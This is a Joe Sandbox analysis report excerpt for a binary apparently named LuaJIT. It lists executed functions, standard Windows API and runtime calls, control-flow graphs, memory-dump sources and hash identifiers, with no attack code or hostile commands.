77142->77142 77143->76856 77145 7ff772386b92 77144->77145 77157 7ff772394a00 77145->77157 77148 7ff772386bee 77170 7ff772385250 60 API calls _wcsupr_s 77148->77170 77149 7ff772386c01 77160 7ff77238de20 77149->77160 77153 7ff772385300 96 API calls 77154 7ff772386c3d 77153->77154 77163 7ff77238a810 77154->77163 77156 7ff772385116 77156->76864 77171 7ff77238a530 77157->77171 77159 7ff772386be1 77159->77148 77159->77149 77161 7ff772383037 _mbsncpy_s 94 API calls 77160->77161 77162 7ff772386c2b 77161->77162 77162->77153 77220 7ff7723ae2c0 77163->77220 77165 7ff772383037 _mbsncpy_s 94 API calls 77166 7ff77238a842 77165->77166 77166->77165 77167 7ff77238a937 77166->77167 77168 7ff77238b260 6 API calls 77167->77168 77169 7ff77238a965 77168->77169 77169->77156 77170->77156 77180 7ff7723a6950 77171->77180 77173 7ff77238a559 77175 7ff77238a55d _handle_error 77173->77175 77176 7ff77238a57c memcpy_s 77173->77176 77184 7ff7723a8930 77173->77184 77175->77159 77176->77175 77177 7ff772383037 _mbsncpy_s 94 API calls 77176->77177 77178 7ff77238a7cb 77177->77178 77178->77175 77187 7ff77238b260 77178->77187 77181 7ff7723a6963 LoadLibraryExA 77180->77181 77182 7ff7723a6982 Concurrency::details::_UnrealizedChore::_CancelViaToken 77180->77182 77181->77182 77183 7ff7723a6986 GetProcAddressForCaller 77181->77183 77182->77173 77183->77182 77195 7ff7723a8bb0 GetLastError VirtualAlloc SetLastError 77184->77195 77186 7ff7723a894c memcpy_s 77186->77176 77188 7ff77238b28a 77187->77188 77197 7ff7723a3ed0 77188->77197 77190 7ff77238b29e 77200 7ff7723a27e0 77190->77200 77193 7ff77238b2a8 77194 7ff77238b39c 77193->77194 77204 7ff7723a8ad0 77193->77204 77194->77175 77196 7ff7723a8bf3 77195->77196 77196->77186 77208 7ff7723da990 77197->77208 77199 7ff7723a3ef3 77199->77190 77201 7ff7723a2802 77200->77201 77203 7ff7723a280c 77200->77203 77213 7ff7723d7300 VirtualFree 77201->77213 77203->77193 77207 7ff7723a8af3 77204->77207 77205 7ff7723a8b35 77205->77194 77207->77205 77214 7ff7723a8c90 GetLastError 77207->77214 77209 7ff7723da9ca 77208->77209 77210 7ff7723daa0d 77209->77210 77212 7ff7723dada0 VirtualFree 77209->77212 77210->77199 77212->77209 77213->77203 77218 7ff7723a8cb2 77214->77218 77215 7ff7723a8d65 SetLastError 77217 7ff7723a8cd9 77215->77217 77216 7ff7723a8cbe VirtualQuery 77216->77217 77216->77218 77217->77207 77218->77215 77218->77216 77218->77217 77219 7ff7723a8d18 VirtualFree 77218->77219 77219->77217 77219->77218 77221 7ff7723ae2f6 77220->77221 77222 7ff7723ae33e 77220->77222 77226 7ff7723ae6e0 WaitForSingleObject DeleteCriticalSection 77221->77226 77222->77166 77224 7ff7723ae300 77227 7ff7723a3bb0 94 API calls 3 library calls 77224->77227 77226->77224 77227->77222

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 00007FF736E28F79 Relevance: 18.2, Strings: 11, Instructions: 4425COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000003.1785998322.00007FF736E27000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF736E27000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_3_7ff736e27000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: )$/$0$1$2$3$4$5$9$:$hK"
                                                                                                                                                                                                                              • API String ID: 0-2647876322
                                                                                                                                                                                                                              • Opcode ID: a90dfbf4ed30e8049abc1fea1a21e66de54307bdb11e7104bfd3fa953124ab63
                                                                                                                                                                                                                              • Instruction ID: d27387b81af567cb3b5d898b52ca04d7109b756ab1a898118fc1465008b0be24
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a90dfbf4ed30e8049abc1fea1a21e66de54307bdb11e7104bfd3fa953124ab63
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B83D731C14A0E9AF766BF288844E62F3A3FF19310F984779CC5E6A4C5DB3474CA9691
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77242D4C8 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 59578552-0
                                                                                                                                                                                                                              • Opcode ID: c3fe8214b16f530c2ff025624e93238b1ef076cc00c72679bf34fd4b3cef675e
                                                                                                                                                                                                                              • Instruction ID: 36207941286fd836926870f1cd3ed98fa8c57ff21b1312ef249dd64834ccf72a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3fe8214b16f530c2ff025624e93238b1ef076cc00c72679bf34fd4b3cef675e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0E09223F3D512C1EA58366B18520BCA8905F4A320FE00235F5BA596C6CDAD2DD2CE32
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF736E28F8B Relevance: .6, Instructions: 578COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000003.1785998322.00007FF736E27000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF736E27000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_3_7ff736e27000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 3989f6ebb41953225926335a6cb28217e35165c4c0a32a4c0858b35e171e608b
                                                                                                                                                                                                                              • Instruction ID: 5997937f234d921ecce0a004f74eced313386a78c1c135e865ed1263d3567e98
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3989f6ebb41953225926335a6cb28217e35165c4c0a32a4c0858b35e171e608b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73229F70814F0F5EE7A5EF288844A91F7A1FB09330F9447B8C8BD976D2EB3465868781
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772461E0C Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 7ff772461e0c-7ff772461e7f call 7ff7724619f0 3 7ff772461e99-7ff772461ea3 call 7ff7724679a0 0->3 4 7ff772461e81-7ff772461e8a call 7ff77244aed8 0->4 10 7ff772461ebe-7ff772461f27 CreateFileW 3->10 11 7ff772461ea5-7ff772461ebc call 7ff77244aed8 call 7ff77244aef8 3->11 9 7ff772461e8d-7ff772461e94 call 7ff77244aef8 4->9 23 7ff7724621d2-7ff7724621f2 9->23 14 7ff772461f29-7ff772461f2f 10->14 15 7ff772461fa4-7ff772461faf GetFileType 10->15 11->9 20 7ff772461f71-7ff772461f9f GetLastError call 7ff77244ae88 14->20 21 7ff772461f31-7ff772461f35 14->21 17 7ff772462002-7ff772462009 15->17 18 7ff772461fb1-7ff772461fec GetLastError call 7ff77244ae88 CloseHandle 15->18 26 7ff77246200b-7ff77246200f 17->26 27 7ff772462011-7ff772462014 17->27 18->9 34 7ff772461ff2-7ff772461ffd call 7ff77244aef8 18->34 20->9 21->20 28 7ff772461f37-7ff772461f6f CreateFileW 21->28 32 7ff77246201a-7ff77246206b call 7ff7724678b8 26->32 27->32 33 7ff772462016 27->33 28->15 28->20 38 7ff77246206d-7ff772462079 call 7ff772461bfc 32->38 39 7ff77246208a-7ff7724620ba call 7ff77246175c 32->39 33->32 34->9 38->39 45 7ff77246207b 38->45 46 7ff7724620bc-7ff7724620ff 39->46 47 7ff77246207d-7ff772462085 call 7ff77245d5d8 39->47 45->47 49 7ff772462121-7ff77246212c 46->49 50 7ff772462101-7ff772462105 46->50 47->23 53 7ff7724621d0 49->53 54 7ff772462132-7ff772462136 49->54 50->49 52 7ff772462107-7ff77246211c 50->52 52->49 53->23 54->53 55 7ff77246213c-7ff772462181 CloseHandle CreateFileW 54->55 56 7ff772462183-7ff7724621b1 GetLastError call 7ff77244ae88 call 7ff772467ae0 55->56 57 7ff7724621b6-7ff7724621cb 55->57 56->57 57->53
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1330151763-0
                                                                                                                                                                                                                              • Opcode ID: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                                                                                                                                                                                              • Instruction ID: 75f81c894d639bd62b23f1903c91f94c37c5d3c53f8d85ff4f7bd6175a9893c3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AC1B277B34A4286EB10EF6AC4905AC7771F748B98B901225DE3E57794CF78D851CB10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245E1DC Relevance: 10.8, APIs: 7, Instructions: 291COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 62 7ff77245e1dc-7ff77245e202 63 7ff77245e21d-7ff77245e221 62->63 64 7ff77245e204-7ff77245e218 call 7ff77244aed8 call 7ff77244aef8 62->64 66 7ff77245e227-7ff77245e22e 63->66 67 7ff77245e600-7ff77245e60c call 7ff77244aed8 call 7ff77244aef8 63->67 81 7ff77245e617 64->81 66->67 69 7ff77245e234-7ff77245e266 66->69 84 7ff77245e612 call 7ff772458b14 67->84 69->67 72 7ff77245e26c-7ff77245e273 69->72 75 7ff77245e28c-7ff77245e28f 72->75 76 7ff77245e275-7ff77245e287 call 7ff77244aed8 call 7ff77244aef8 72->76 79 7ff77245e5fc-7ff77245e5fe 75->79 80 7ff77245e295-7ff77245e297 75->80 76->84 85 7ff77245e61a-7ff77245e631 79->85 80->79 86 7ff77245e29d-7ff77245e2a0 80->86 81->85 84->81 86->76 89 7ff77245e2a2-7ff77245e2c8 86->89 91 7ff77245e307-7ff77245e30f 89->91 92 7ff77245e2ca-7ff77245e2cd 89->92 93 7ff77245e2d9-7ff77245e2f0 call 7ff77244aed8 call 7ff77244aef8 call 7ff772458b14 91->93 94 7ff77245e311-7ff77245e339 call 7ff77245a290 call 7ff772459294 * 2 91->94 95 7ff77245e2f5-7ff77245e302 92->95 96 7ff77245e2cf-7ff77245e2d7 92->96 123 7ff77245e490 93->123 125 7ff77245e33b-7ff77245e351 call 7ff77244aef8 call 7ff77244aed8 94->125 126 7ff77245e356-7ff77245e387 call 7ff772460728 94->126 97 7ff77245e38b-7ff77245e39e 95->97 96->93 96->95 100 7ff77245e41a-7ff77245e424 call 7ff77244a548 97->100 101 7ff77245e3a0-7ff77245e3a8 97->101 114 7ff77245e4ae 100->114 115 7ff77245e42a-7ff77245e43f 100->115 101->100 104 7ff77245e3aa-7ff77245e3ac 101->104 104->100 108 7ff77245e3ae-7ff77245e3c5 104->108 108->100 112 7ff77245e3c7-7ff77245e3d3 108->112 112->100 117 7ff77245e3d5-7ff77245e3d7 112->117 119 7ff77245e4b3-7ff77245e4d3 ReadFile 114->119 115->114 120 7ff77245e441-7ff77245e453 GetConsoleMode 115->120 117->100 124 7ff77245e3d9-7ff77245e3f1 117->124 127 7ff77245e4d9-7ff77245e4e1 119->127 128 7ff77245e5c6-7ff77245e5cf GetLastError 119->128 120->114 122 7ff77245e455-7ff77245e45d 120->122 122->119 129 7ff77245e45f-7ff77245e481 ReadConsoleW 122->129 132 7ff77245e493-7ff77245e49d call 7ff772459294 123->132 124->100 133 7ff77245e3f3-7ff77245e3ff 124->133 125->123 126->97 127->128 135 7ff77245e4e7 127->135 130 7ff77245e5ec-7ff77245e5ef 128->130 131 7ff77245e5d1-7ff77245e5e7 call 7ff77244aef8 call 7ff77244aed8 128->131 138 7ff77245e483 GetLastError 129->138 139 7ff77245e4a2-7ff77245e4ac 129->139 143 7ff77245e489-7ff77245e48b call 7ff77244ae88 130->143 144 7ff77245e5f5-7ff77245e5f7 130->144 131->123 132->85 133->100 142 7ff77245e401-7ff77245e403 133->142 146 7ff77245e4ee-7ff77245e503 135->146 138->143 139->146 142->100 150 7ff77245e405-7ff77245e415 142->150 143->123 144->132 146->132 152 7ff77245e505-7ff77245e510 146->152 150->100 153 7ff77245e537-7ff77245e53f 152->153 154 7ff77245e512-7ff77245e52b call 7ff77245dda0 152->154 158 7ff77245e5b4-7ff77245e5c1 call 7ff77245db58 153->158 159 7ff77245e541-7ff77245e553 153->159 162 7ff77245e530-7ff77245e532 154->162 158->162 163 7ff77245e5a7-7ff77245e5af 159->163 164 7ff77245e555 159->164 162->132 163->132 166 7ff77245e55a-7ff77245e561 164->166 167 7ff77245e59d-7ff77245e5a1 166->167 168 7ff77245e563-7ff77245e567 166->168 167->163 169 7ff77245e569-7ff77245e570 168->169 170 7ff77245e583 168->170 169->170 171 7ff77245e572-7ff77245e576 169->171 172 7ff77245e589-7ff77245e599 170->172 171->170 173 7ff77245e578-7ff77245e581 171->173 172->166 174 7ff77245e59b 172->174 173->172 174->163
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: fed177e880270391593b347b1ec8381c866ee3668e23bdf448b2c5c867d7794d
                                                                                                                                                                                                                              • Instruction ID: cf1ef9a5aa1b91cb5b3843e3ca4ea1f720b1b3426d2c73388d0e140b2df17b48
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fed177e880270391593b347b1ec8381c866ee3668e23bdf448b2c5c867d7794d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42C1BF23B386C641EB61AF57900027DABA1EB85B80FD44131EEAD07791DEBCEC55CB24
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77239F8B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 166stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 175 7ff77239f8b0-7ff77239f8dc 177 7ff77239fbd0-7ff77239fbe2 call 7ff772390950 175->177 178 7ff77239f8e2-7ff77239f8f4 175->178 185 7ff77239fbe4-7ff77239fbe8 177->185 179 7ff77239f8fa-7ff77239f93f call 7ff77239d090 178->179 180 7ff77239fb0b-7ff77239fb34 call 7ff77239f4a0 178->180 190 7ff77239f97f-7ff77239f989 179->190 191 7ff77239f941-7ff77239f958 179->191 188 7ff77239fb36-7ff77239fb53 call 7ff772390a70 180->188 189 7ff77239fb58-7ff77239fb67 180->189 188->185 197 7ff77239fba7-7ff77239fbc3 call 7ff77239f180 189->197 198 7ff77239fb69-7ff77239fba5 call 7ff7723a1360 189->198 195 7ff77239f996-7ff77239f9a8 190->195 196 7ff77239f98b-7ff77239f994 190->196 192 7ff77239f970-7ff77239f975 191->192 193 7ff77239f95a-7ff77239f96b call 7ff77239f1d0 191->193 192->185 193->192 202 7ff77239f9b5-7ff77239f9e8 call 7ff77239f420 195->202 203 7ff77239f9aa-7ff77239f9b3 195->203 201 7ff77239f9f7-7ff77239fa07 196->201 197->177 198->185 209 7ff77239fb09 201->209 210 7ff77239fa0d-7ff77239fa24 201->210 206 7ff77239f9ed-7ff77239f9f2 202->206 203->206 206->201 209->189 213 7ff77239fa26-7ff77239fa37 call 7ff77239f1d0 210->213 214 7ff77239fa3c-7ff77239fa53 210->214 213->214 215 7ff77239fa5f-7ff77239fa6b 214->215 216 7ff77239fa55-7ff77239fa5a 214->216 218 7ff77239fa81-7ff77239fa85 215->218 219 7ff77239fa6d-7ff77239fa7f call 7ff772390950 215->219 216->185 221 7ff77239faa8-7ff77239faba 218->221 222 7ff77239fa87-7ff77239faa6 218->222 224 7ff77239faea-7ff77239faff call 7ff77239d290 219->224 221->224 225 7ff77239fabc-7ff77239fad4 221->225 222->224 230 7ff77239fb04 224->230 226 7ff77239fad6 225->226 227 7ff77239fad8-7ff77239fae5 call 7ff772390950 225->227 226->224 226->227 227->224 230->185
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strrchr
                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                              • API String ID: 3418686817-2564639436
                                                                                                                                                                                                                              • Opcode ID: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                                                                                                                                                                                              • Instruction ID: 9cbec5b7a8c4a961ab66fdc49d0d9a1457a03b0a220e3b51504ed1787517a248
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09913C2363CB8585DB609B15E45037AA760F786BA8F604276DAEE47BA8CF7CD440CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772459BF4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: String$try_get_function
                                                                                                                                                                                                                              • String ID: LCMapStringEx
                                                                                                                                                                                                                              • API String ID: 1203122356-3893581201
                                                                                                                                                                                                                              • Opcode ID: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                                                                                                                                                                                              • Instruction ID: 4426712a84f8010864cf8d269ea675d14b5b5aa7d571a4bd8567fe1281f5d4a7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70114C32A28B8086D760DB56F4802AAB7A4F789B90F444136EEDD43B58CF7CD540CB40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723A6950 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressCallerLibraryLoadProc
                                                                                                                                                                                                                              • String ID: SystemFunction036$advapi32.dll
                                                                                                                                                                                                                              • API String ID: 4215043672-1354007664
                                                                                                                                                                                                                              • Opcode ID: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                                                                                                                                                                                              • Instruction ID: 4c74ee309f033af3fccab8e7f7f59bd8948e039c15d928287d21ab23edbee144
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2111623D3D64681EF94BB11E944739A2B0FB85380FD0517DE9AE42698DFBCD854CE20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77240F000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25libraryCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00007FF77240EDD3), ref: 00007FF77240F013
                                                                                                                                                                                                                              • LoadLibraryExA.KERNELBASE(?,?,?,?,?,?,00007FF77240EDD3), ref: 00007FF77240F034
                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7723D17E7), ref: 00007FF77240F061
                                                                                                                                                                                                                                • Part of subcall function 00007FF77240EE80: GetLastError.KERNEL32 ref: 00007FF77240EE96
                                                                                                                                                                                                                                • Part of subcall function 00007FF77240EE80: FormatMessageA.KERNEL32 ref: 00007FF77240EECA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
